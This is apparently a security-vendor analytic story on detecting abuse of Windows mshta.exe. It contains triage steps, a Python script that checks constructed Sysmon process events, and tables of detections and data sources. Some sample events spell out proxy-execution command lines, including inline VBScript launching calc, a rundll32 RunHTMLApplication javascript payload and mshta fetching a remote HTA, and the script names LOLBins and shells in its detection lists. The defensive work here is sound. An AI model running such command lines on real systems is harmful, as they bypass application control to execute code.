Analytics Story: Suspicious MSHTA Activity

Description

Monitor and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code.

Why it matters

One common adversary tactic is to bypass application control solutions via the mshta.exe process, the Windows host for Microsoft HTML Applications (.hta files), which renders them through mshtml.dll. In these cases, attackers use the trusted, signed Windows utility to proxy execution of malicious content, whether an .hta application, JavaScript, or VBScript. The searches in this story help you detect and investigate suspicious activity that may indicate that an attacker is leveraging mshta.exe to execute malicious code.

Triage

Validate execution

  1. Determine if mshta.exe executed. Validate the OriginalFileName of mshta.exe and further PE metadata, rather than trusting the on-disk file name. If it executed from anywhere other than C:\Windows\System32 or C:\Windows\SysWOW64, treat it as highly suspect.
  2. Determine if script code was executed with mshta.exe, whether inline (javascript: or vbscript: in the command line), from a local .hta file, or from a remote URL.

Situational awareness

The objective of this step is to identify suspicious behavioral indicators related to the execution of script code by mshta.exe.

  3. Parent process. Is the parent process a known LOLBin? Is the parent process an Office application?
  4. Module loads. Are the known mshta.exe modules (for example mshtml.dll) being loaded by a non-standard application? Is mshta.exe loading any suspicious DLLs?
  5. Network connections. Any network connections? Review the reputation of the remote IP or domain.

Retrieval of script code

The objective of this step is to confirm whether the executed script code is benign or malicious.
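The triage steps above, applied to Sysmon Event ID 1 records, as an added Python example that is not part of this analytic story or the Splunk searches it lists. It stands in for the SPL searches so the checks can be run offline: the five sample events, the helper names (parse_event, triage, run_samples) and the finding strings are constructed for this example, and the renamed/inline/URL/parent/child checks mirror the detection names in the table below rather than reproducing their exact SPL.

```python
"""Triage of Sysmon Event ID 1 (process creation) records for suspicious mshta.exe use.

Added example, not code from the Splunk analytic story. The sample events are
constructed, not captured from a real host.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Sysmon XML events carry the Windows event namespace on every element.
NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Only these two locations are legitimate for the real binary (triage step 1).
TRUSTED_MSHTA = {r"c:\windows\system32\mshta.exe", r"c:\windows\syswow64\mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
           "cmd.exe", "powershell.exe", "certutil.exe"}
# Interpreters that mshta.exe has no business spawning on a typical workstation.
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
          "rundll32.exe", "regsvr32.exe"}


def parse_event(xml_text: str) -> Dict[str, str]:
    """Return the EventData fields of one Sysmon event as a dict."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.iter(NS + "Data")}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(ev: Dict[str, str]) -> List[str]:
    """Apply the triage checks to one parsed event; return the findings."""
    image = ev.get("Image", "")
    cmd = ev.get("CommandLine", "").lower()
    parent = basename(ev.get("ParentImage", ""))
    original = ev.get("OriginalFileName", "").lower()
    findings: List[str] = []

    # Child of mshta.exe: here Image is the child, so check before the mshta gate.
    if parent == "mshta.exe" and basename(image) in SHELLS:
        findings.append("suspicious mshta child process: " + basename(image))
    # rundll32 can host an HTA without mshta.exe via mshtml's RunHTMLApplication.
    if basename(image) == "rundll32.exe" and "runhtmlapplication" in cmd:
        findings.append("rundll32 inline HTA execution")

    # Step 1: identify mshta.exe by PE metadata (OriginalFileName), not file name.
    is_mshta = original == "mshta.exe" or basename(image) == "mshta.exe"
    if not is_mshta:
        return findings
    if original == "mshta.exe" and basename(image) != "mshta.exe":
        findings.append("renamed mshta: " + image)
    if image.lower() not in TRUSTED_MSHTA:
        findings.append("mshta outside System32/SysWOW64: " + image)
    # Step 2: how was the script code supplied?
    if "javascript:" in cmd or "vbscript:" in cmd:
        findings.append("inline script in command line")
    if "http://" in cmd or "https://" in cmd:
        findings.append("URL in command line")
    # Step 3: parent process.
    if parent in OFFICE_APPS:
        findings.append("spawned by Office application: " + parent)
    elif parent in LOLBINS:
        findings.append("spawned by LOLBin: " + parent)
    return findings


def _event(image: str, cmd: str, parent: str, original: str) -> str:
    """Build a minimal Sysmon Event ID 1 record (constructed sample data)."""
    return (
        f"<Event xmlns='{NS[1:-1]}'><System><EventID>1</EventID></System><EventData>"
        f"<Data Name='Image'>{image}</Data>"
        f"<Data Name='CommandLine'>{cmd}</Data>"
        f"<Data Name='ParentImage'>{parent}</Data>"
        f"<Data Name='OriginalFileName'>{original}</Data>"
        "</EventData></Event>"
    )


SAMPLE_EVENTS = [
    # Benign: signed binary in System32 opening a local HTA from Explorer.
    _event(r"C:\Windows\System32\mshta.exe", r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
           r"C:\Windows\explorer.exe", "MSHTA.EXE"),
    # Word launching mshta.exe against a remote HTA (domain is a placeholder).
    _event(r"C:\Windows\System32\mshta.exe", "mshta.exe https://example.invalid/update.hta",
           r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "MSHTA.EXE"),
    # mshta.exe copied to a user-writable path, renamed, running inline VBScript.
    _event(r"C:\Users\Public\svchost.exe",
           'svchost.exe vbscript:Close(Execute("CreateObject(""Wscript.Shell"").Run ""calc.exe"""))',
           r"C:\Windows\System32\cmd.exe", "MSHTA.EXE"),
    # mshta.exe spawning a command shell.
    _event(r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami",
           r"C:\Windows\System32\mshta.exe", "Cmd.Exe"),
    # rundll32 hosting an HTA payload without mshta.exe.
    _event(r"C:\Windows\System32\rundll32.exe",
           r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(1)',
           r"C:\Windows\System32\cmd.exe", "RUNDLL32.EXE"),
]


def run_samples() -> List[List[str]]:
    return [triage(parse_event(e)) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for i, found in enumerate(run_samples()):
        print(f"event {i}: {found or ['no findings']}")
```

The first sample (real binary, trusted path, local file, Explorer parent) produces no findings, which is the expected result for ordinary administrative use of HTAs; the renamed sample trips three checks at once because the gate is OriginalFileName, not the on-disk name. Module loads (step 4) and network connections (step 5) need Sysmon Event ID 7 and 3 respectively, which are not in this story's data source list, so they are left out here.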

Detections

Name | Technique | Type
Detect mshta inline hta execution | System Binary Proxy Execution, Mshta | TTP
Detect mshta renamed | System Binary Proxy Execution, Mshta | Hunting
Detect MSHTA Url in Command Line | System Binary Proxy Execution, Mshta | TTP
Detect Prohibited Applications Spawning cmd exe | Command and Scripting Interpreter, Windows Command Shell | Hunting
Detect Rundll32 Inline HTA Execution | System Binary Proxy Execution, Mshta | TTP
Registry Keys Used For Persistence | Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution | TTP
Suspicious mshta child process | System Binary Proxy Execution, Mshta | TTP
Suspicious mshta spawn | System Binary Proxy Execution, Mshta | TTP
Windows MSHTA Writing to World Writable Path | Mshta | TTP

Data Sources

Name | Platform | Sourcetype | Source
CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor | crowdstrike
Sysmon EventID 1 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 11 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 12 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 | Windows | xmlwineventlog | XmlWinEventLog:Security

Source: GitHub | Version: 2